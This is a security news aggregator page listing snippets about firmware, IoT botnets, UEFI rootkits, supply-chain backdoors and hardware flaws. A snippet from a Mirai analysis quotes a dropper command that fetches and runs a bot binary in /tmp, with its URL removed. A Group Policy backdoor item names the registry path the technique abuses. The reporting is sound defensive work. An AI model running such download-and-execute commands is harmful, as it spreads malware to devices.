Architecture, Firmware and Information - Cyber Security Informer

New Mirai botnet targets TBK DVRs by exploiting CVE-2024-3721

Security Affairs

JUNE 9, 2025

“Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. “Most of these bots don’t stay active after the device restarts because some device firmware doesn’t allow changes to the file system. ” reads the analysis.

IoT

IoT Firmware Malware Architecture

Dynamic analysis of firmware components in IoT devices

SecureList

JULY 6, 2022

As a rule, this means that the source code of the device’s firmware is unavailable and all the researcher can use is the user manual and a few threads on some user forum discussing the device’s operation. The vulnerability assessment of IoT/IIoT devices is based on analyzing their firmware.

Firmware

Firmware IoT Architecture Manufacturing

Android devices shipped with backdoored firmware as part of the BADBOX network

Security Affairs

OCTOBER 8, 2023

Researchers warn that more than 70,000 Android smartphones, CTV boxes, and tablets were shipped with backdoored firmware as part of BADBOX network. Cybersecurity researchers at Human Security discovered a global network of consumer products, dubbed BADBOX, with firmware backdoors installed and sold through a compromised hardware supply chain.

Firmware

Firmware Mobile Malware Retail

Sophos details five years of China-linked threat actors’ activity targeting network devices worldwide

Security Affairs

NOVEMBER 2, 2024

Successful exploitation of these vulnerabilities could allow attackers to steal sensitive data, inject firmware payloads, and even reach LAN-connected devices. Attackers maintained persistence through VPN credentials, Active Directory DCSYNC access, and firmware-hooking methods to survive updates. ” concludes the report.

Firmware

Firmware Government Firewall Malware

Western Digital customers have to update their My Cloud devices to latest firmware version

Security Affairs

DECEMBER 18, 2021

My Cloud OS firmware is reaching the end of support, Western Digital customers have to update their WD My Cloud devices to the latest version. Devices on these older firmware versions will not receive security fixes or technical support.” Follow me on Twitter: @securityaffairs and Facebook. Pierluigi Paganini.

Firmware

Firmware Architecture Internet Internet

New Triada Trojan comes preinstalled on Android devices

Security Affairs

APRIL 2, 2025

The researchers speculate that threat actors behind this variant have compromised the supply chain, so stores may not even suspect that they are selling smartphones infected with Triada “The new version of the malware is distributed in the firmware of infected Android devices. It is located in the system framework.

Cryptocurrency

Cryptocurrency Malware Mobile Firmware

ÆPIC Leak is the first CPU flaw able to architecturally disclose sensitive data

Security Affairs

AUGUST 17, 2022

Researchers uncovered a new flaw, dubbed ÆPIC, in Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors. The ÆPIC Leak ( CVE-2022-21233 ) is the first architecturally CPU bug that could lead to the disclosure of sensitive data and impacts most 10th, 11th and 12th generation Intel CPUs.

Architecture

Architecture Firmware Software Information Security

Mercedes-Benz Head Unit security research report

SecureList

JANUARY 17, 2025

Their report is a good starting point for diving deep into the MBUX internals and understanding the architecture of the system. Full information on the MBUX architecture can be found in the KeenLab research. Firmware The MMB runs on Linux, and its filesystems are located on the eMMC. connections via USB and custom IPC.

Backups

Backups Architecture Firmware Software

AMD is going to patch UEFI SMM callout privilege escalation flaw

Security Affairs

JUNE 22, 2020

AMD is going to release patches for a flaw affecting the System Management Mode (SMM) of the Unified Extensible Firmware Interface (UEFI). The vulnerability was discovered by the security researcher Danny Odler, it resides in the AMD’s Mini PC could allow attackers to manipulate secure firmware and execute arbitrary code.

Firmware

Firmware Architecture Advertising Manufacturing

CVE-2019-0090 flaw affects Intel Chips released in the last 5 years

Security Affairs

MARCH 7, 2020

The CVE-2019-0090 vulnerability affects the firmware running on the ROM of the Intel’s Converged Security and Management Engine (CSME). Intel CSME is responsible for initial authentication of Intel-based systems by loading and verifying all other firmware for modern platforms.” x, SPS_E3_05.00.04.027.0.

Firmware

Firmware Technology Advertising Authentication

Pink Botnet infected over 1.6 Million Devices, it is one of the largest botnet ever seen

Security Affairs

NOVEMBER 1, 2021

The number of infected devices is impressive, on 2019-11-30 a trusted security partner in the US informed Qihoo 360’s Netlab Cybersecurity reported to have observed 1,962,308 unique daily active IPs from the Pink botnet targeting its systems. According to the experts, Pink is the largest botnet they have observed in the last six years.

Architecture

Architecture DDOS Advertising DNS

Dark Mirai botnet spreads targeting RCE on TP-Link routers

Security Affairs

DECEMBER 9, 2021

. “The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.” TP-Link addressed the flaw on November 12, 2021 with the release of the firmware update TL-WR840N(EU)_V5_211109.

Firmware

Firmware Architecture Malware Hacking

Triada strikes back

SecureList

APRIL 25, 2025

With time, the vulnerabilities were patched, and restrictions were added to the firmware. Attackers are leveraging this by embedding malicious software into Android device firmware. Attackers are now embedding a sophisticated multi-stage loader directly into device firmware. oat ) located in the same directory.

Cryptocurrency

Cryptocurrency Malware Firmware Accountability

Second-ever UEFI rootkit used in North Korea-themed attacks

Security Affairs

OCTOBER 5, 2020

The experts were investigating several suspicious UEFI firmware images when discovered four components, some of which were borrowing the source code a Hacking Team spyware. The firmware malware is based on code associated with HackingTeam’s VectorEDK bootkit, with minor changes. ” concludes the report.

Firmware

Firmware Spyware Surveillance Hacking

PixieFail: Nine flaws in UEFI open-source reference implementation could have severe impacts

Security Affairs

JANUARY 18, 2024

Unified Extensible Firmware Interface (UEFI) is a specification that defines the architecture of the platform firmware used for booting the computer hardware and its interface for interaction with the operating system. NetworkPkg is a set of modules that implements networking capabilities within the UEFI environment. .

Firmware

Firmware DNS Advertising Architecture

MITRE, CISA Reveal Dangerous Hardware & Software Vulnerabilities

eSecurity Planet

NOVEMBER 4, 2021

The unranked list contains 12 entries that categorize data found in hardware programming, design, and architecture. CWE-1191 : On-Chip Debug and Test Interface With Improper Access Control – the debug interface (JTAG) might be used to bypass on-chip protection to extract information. The full MITRE-CWE list.

Software

Software Firmware Computers and Electronics Risk

Practical coexistence attacks on billions of WiFi chips allow data theft and traffic manipulation

Security Affairs

DECEMBER 13, 2021

The WiFi chip encrypts network traffic and holds the current WiFi credentials, thereby providing the attacker with further information.” Threat actors can execute code by exploiting an unpatched or new security issue over-the-air, or abusing the local OS firmware update mechanism. ” concludes the paper. Pierluigi Paganini.

Wireless

Wireless Firmware Mobile Passwords

US and UK link new Cyclops Blink malware to Russian state hackers?

Security Affairs

FEBRUARY 23, 2022

. “The actor has so far primarily deployed Cyclops Blink to WatchGuard devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.” The malware leverages the firmware update process to achieve persistence.

Malware

Malware Firmware Architecture Firewall

News Alert: Swissbit introduces small-capacity memory for IIoT, smart city applications

The Last Watchdog

JUNE 27, 2023

The models of the EM-30 and S-56(u) series, which are available as an embedded component in the form of an e.MMC or as flexible, interchangeable SD memory cards, offer maximum reliability due to proven firmware architecture. For further information, please visit www. They also guarantee 100% data security.

IoT

IoT Manufacturing Media Technology

A bowl full of security problems: Examining the vulnerabilities of smart pet feeders

SecureList

JUNE 20, 2023

The findings of the study reveal a number of serious security issues, including the use of hard-coded credentials, and an insecure firmware update process. The described setup allowed us to verify the information passing through, for example, during the over-the-air update process.

Firmware

Firmware Passwords Manufacturing Mobile

Cyclops Blink malware: US and UK authorities issue alert

Malwarebytes

FEBRUARY 24, 2022

But the NCSC warns that it is likely that Sandworm is capable of compiling the same or very similar malware for other architectures and firmware. When it comes to infected appliances, Cyclops Blink persists on reboot and throughout the legitimate firmware update process.

Malware

Malware Firewall Firmware DDOS

Mozi Botnet is responsible for most of the IoT Traffic

Security Affairs

SEPTEMBER 20, 2020

The botnet supports the following capabilities: DDoS attack Collecting Bot Information Execute the payload of the specified URL Update the sample from the specified URL Execute system or custom commands. Once gained access to the device, the bot attempt to execute a malicious payload and the bot will automatically join the Mozi P2P network.

IoT

IoT DDOS Architecture Passwords

Kali Linux 2025.2 Release (Kali Menu Refresh, BloodHound CE & CARsenal)

Kali Linux

JUNE 12, 2025

amd64 NOTE: The output of uname -r may be different depending on the system architecture. KDE Plasma 6.3 KDE Plasma fans, rejoice – we’ve included Plasma 6.3, brings both flexibility and style. New Tools in Kali It would not be a Kali release if there were not any new tools added! " VERSION="2025.2"

VPN

VPN Wireless Firmware Authentication

Weaponizing Group Policy: Custom Client-Side Extensions as a Stealthy Backdoor into Active Directory

Penetration Testing

JUNE 5, 2025

This architecture offers a dangerous opportunity: if an attacker can register their own CSE, they gain persistent SYSTEM-level code execution across all machines applying the GPO. Registered in the Windows registry under the HKLM:SOFTWAREMicrosoftWindows NTCurrentVersionWinlogonGPExtensions path.

Penetration Testing

Penetration Testing Malware Advertising Firmware

Fully segregated networks? Your dual-homed devices might disagree

Pen Test Partners

MAY 21, 2025

Crucially, due to a combination of outdated firmware resulting in unintended exposure of network services and cleartext transmission of weak, reused and default passwords, these dual-homed devices could enable an attacker to compromise critical control and safety networks from untrusted network zones.

Firewall

Firewall Firmware Engineering Penetration Testing

Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721

SecureList

JUNE 6, 2025

cd /tmp; rm arm7; wget [link] chmod 777 *; /arm7 tbk Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. Using this information, the malware verifies if there are any processes with VMware or QEMU-arm in their command line.

Internet

Internet Internet DDOS Malware

The secrets of Schneider Electric’s UMAS protocol

SecureList

SEPTEMBER 29, 2022

By mid-August 2022, Schneider Electric had released an update for the EcoStruxure™ Control Expert software, as well as for Modicon M340 and Modicon M580 PLC firmware, that fixes the vulnerability. UMAS is based on a client-server architecture. UMAS also inherits the Modbus client-server architecture.

Firmware

Firmware Passwords Authentication Engineering

Mukashi, the new Mirai variant that targets Zyxel NAS

Security Affairs

MARCH 21, 2020

“ Mukashi brute forces the logins using different combinations of default credentials, while informing its command and control (C2) server of the successful login attempts. Multiple, if not all, Zyxel NAS products running firmware versions up to 5.21 .” reads the analysis published by Palo Alto Network.

DDOS

DDOS Authentication Advertising Firmware

Multiple DDoS botnets were observed targeting Zyxel devices

Security Affairs

JULY 22, 2023

The cause of the vulnerability is the improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35.

DDOS

DDOS Firmware Firewall VPN

Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders

Security Affairs

JUNE 18, 2019

.” The RCE flaw affects TP-Link Wi-Fi Extender models RE365, RE650, RE350 and RE500 running firmware version 1.0.2, The extender operates on the MIPS architecture, like many routers, the zero-day flaw can be triggered. The extender operates on the MIPS architecture, like many routers, the zero-day flaw can be triggered.

Architecture

Architecture Firmware Advertising IoT

US gov agencies e private firms warn nation-state actors are targeting ICS & SCADA devices

Security Affairs

APRIL 14, 2022

“The APT actors’ tools have a modular architecture and enable cyber actors to conduct highly automated exploits against targeted devices. . “The APT actors’ tools have a modular architecture and enable cyber actors to conduct highly automated exploits against targeted devices.

Passwords

Passwords Backups Architecture Cyber Attacks

How to Secure DNS

eSecurity Planet

JULY 25, 2022

DNS cache poisoning is probably more accurate to describe the most common scenario: In this situation, the attacker manages to fill the DNS cache with false information, so the DNS query will redirect users to a rogue IP. That’s why the false information remains in the cache until the expiration, also known as TTL or time to live.

DNS

DNS Encryption Penetration Testing Architecture

Windows 11 is out. Is it any good for security?

Malwarebytes

OCTOBER 5, 2021

The requirements and considerations of each organization will be different, and many things will inform the decisions they make about whether to stick or twist. United Extensible Firmware Interface (UEFI). Windows 11 comes ready to embrace the impressively-named Pluton TPM architecture.

Firmware

Firmware Technology Software Social Engineering

A new Zerobot variant spreads by exploiting Apache flaws

Security Affairs

DECEMBER 22, 2022

Zerobot targets multiple architectures, including i386, amd64, arm, arm64, mips, mips64, mips64le, mipsle, ppc64, ppc64le, riscv64, and s390x. Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches. The bot is saved using the filename “zero.”.

IoT

IoT DDOS Malware Firmware

Red TIM Research (RTR) team discovers a bug on Ericsson Network Manager

Security Affairs

MARCH 18, 2022

In fact, Ericsson Network Manager is an Operations support system (‘OSS’ according to network jargon) , which allows the management of all the devices interconnected to it, ensuring the management of configurations, firmware updates and all automation and maintenance operations of an advanced mobile radio network.

Mobile

Mobile Firmware Architecture Technology

ISaPWN – research on the security of ISaGRAF Runtime

SecureList

MAY 23, 2022

According to public sources of information, ISaGRAF Runtime is used as an automation framework in multiple products in various industries across the globe and its use is not limited to ICS. More information is available on the Kaspersky ICS CERT website.

Authentication

Authentication Architecture Passwords Encryption

BSides Cheltenham 2023 – Stephen – All Your Firmwares Are Belong To Us: A Guide To Successful Acquisition

Security Boulevard

SEPTEMBER 1, 2023

Permalink The post BSides Cheltenham 2023 – Stephen – All Your Firmwares Are Belong To Us: A Guide To Successful Acquisition appeared first on Security Boulevard. Many thanks to BSides Cheltenham for publishing their presenter’s outstanding BSides Cheltenham 2023 security content on the organizations’ YouTube channel.

Firmware

Firmware Architecture CISO Education

A Spectre proof-of-concept for a Spectre-proof web

Google Security

MARCH 12, 2021

Posted by Stephen Röttger and Artur Janc, Information Security Engineers Three years ago, Spectre changed the way we think about security boundaries on the web. We've confirmed that this proof-of-concept, or its variants, function across a variety of operating systems, processor architectures, and hardware generations.

Engineering

Engineering Architecture Software Firmware

Five Cybersecurity Trends that Will Affect Organizations in 2023

CyberSecurity Insiders

DECEMBER 6, 2022

To address this threat, organizations of all sizes while conducting a risk assessment need to take into account the vulnerabilities of all third-party software or firmware. For more information, visit www.netwrix.com. Understaffing will increase the role of channel partners.

Cybersecurity

Cybersecurity Cybercrime Social Engineering Risk

StripedFly: Perennially flying under the radar

SecureList

OCTOBER 25, 2023

This archive is discreetly hosted on legitimate websites, cleverly disguised as firmware binaries for enigmatic devices labeled “m100” The Bitbucket repository was created on June 21, 2018, under the account of Julie Heilman, and it remains the sole repository associated with this profile.

Malware

Malware DNS Encryption Cryptocurrency

Zero-Click Attacks a Growing Threat

eSecurity Planet

FEBRUARY 22, 2022

They can also track the user’s location and use the camera and microphone to literally record everything and extract information. It can even access the chip’s firmware to gain root access on the device, a significant privilege escalation. Also read: Top Vulnerability Management Tools for 2022. The list is available on GitHub.

Spyware

Spyware Software Government Social Engineering

Attacks Escalating Against Linux-Based IoT Devices

eSecurity Planet

JANUARY 20, 2022

CrowdStrike in 2021 also saw a 123 percent year-over-year increase in samples of XorDDoS, a Trojan aimed at multiple Linux architectures, including those powered by x86 chips from Intel and AMD as well as Arm processors. Spies want to steal information. Criminals want to make money. IoT Protection Steps.

IoT

IoT DDOS Malware Internet

What Is Industrial Control System (ICS) Cyber Security?

eSecurity Planet

SEPTEMBER 9, 2024

ISO/IEC 27001: An international standard on managing information security, including within industrial contexts. Patch management: Keeping software and firmware up to date to close security gaps. Impact: Sabotage, theft of proprietary information, or unintentional errors leading to system vulnerabilities.

Firmware

Firmware Encryption Manufacturing Risk

Android Botnet leverages ADB ports and SSH to spread

Security Affairs

JUNE 22, 2019

In order to determine what miner to deliver, the bot collects system information, such as manufacturer, hardware details, and processor architecture. The script for a. sh reveals shows that the attackers can choose from three different miners. Copyright (C) 2014 Media.net Advertising FZ-LLC All Rights Reserved -->.

Cryptocurrency

Cryptocurrency Malware Advertising Firmware

New Mirai botnet targets TBK DVRs by exploiting CVE-2024-3721

Dynamic analysis of firmware components in IoT devices

Trending Sources

Android devices shipped with backdoored firmware as part of the BADBOX network

Sophos details five years of China-linked threat actors’ activity targeting network devices worldwide

Western Digital customers have to update their My Cloud devices to latest firmware version

New Triada Trojan comes preinstalled on Android devices

ÆPIC Leak is the first CPU flaw able to architecturally disclose sensitive data

Mercedes-Benz Head Unit security research report

AMD is going to patch UEFI SMM callout privilege escalation flaw

CVE-2019-0090 flaw affects Intel Chips released in the last 5 years

Pink Botnet infected over 1.6 Million Devices, it is one of the largest botnet ever seen

Dark Mirai botnet spreads targeting RCE on TP-Link routers

Triada strikes back

Second-ever UEFI rootkit used in North Korea-themed attacks

PixieFail: Nine flaws in UEFI open-source reference implementation could have severe impacts

MITRE, CISA Reveal Dangerous Hardware & Software Vulnerabilities

Practical coexistence attacks on billions of WiFi chips allow data theft and traffic manipulation

US and UK link new Cyclops Blink malware to Russian state hackers?

News Alert: Swissbit introduces small-capacity memory for IIoT, smart city applications

A bowl full of security problems: Examining the vulnerabilities of smart pet feeders

Cyclops Blink malware: US and UK authorities issue alert

Mozi Botnet is responsible for most of the IoT Traffic

Kali Linux 2025.2 Release (Kali Menu Refresh, BloodHound CE & CARsenal)

Weaponizing Group Policy: Custom Client-Side Extensions as a Stealthy Backdoor into Active Directory

Fully segregated networks? Your dual-homed devices might disagree

Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721

The secrets of Schneider Electric’s UMAS protocol

Mukashi, the new Mirai variant that targets Zyxel NAS

Multiple DDoS botnets were observed targeting Zyxel devices

Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders

US gov agencies e private firms warn nation-state actors are targeting ICS & SCADA devices

How to Secure DNS

Windows 11 is out. Is it any good for security?

A new Zerobot variant spreads by exploiting Apache flaws

Red TIM Research (RTR) team discovers a bug on Ericsson Network Manager

ISaPWN – research on the security of ISaGRAF Runtime

BSides Cheltenham 2023 – Stephen – All Your Firmwares Are Belong To Us: A Guide To Successful Acquisition

A Spectre proof-of-concept for a Spectre-proof web

Five Cybersecurity Trends that Will Affect Organizations in 2023

StripedFly: Perennially flying under the radar

Zero-Click Attacks a Growing Threat

Attacks Escalating Against Linux-Based IoT Devices

What Is Industrial Control System (ICS) Cyber Security?

Android Botnet leverages ADB ports and SSH to spread

Stay Connected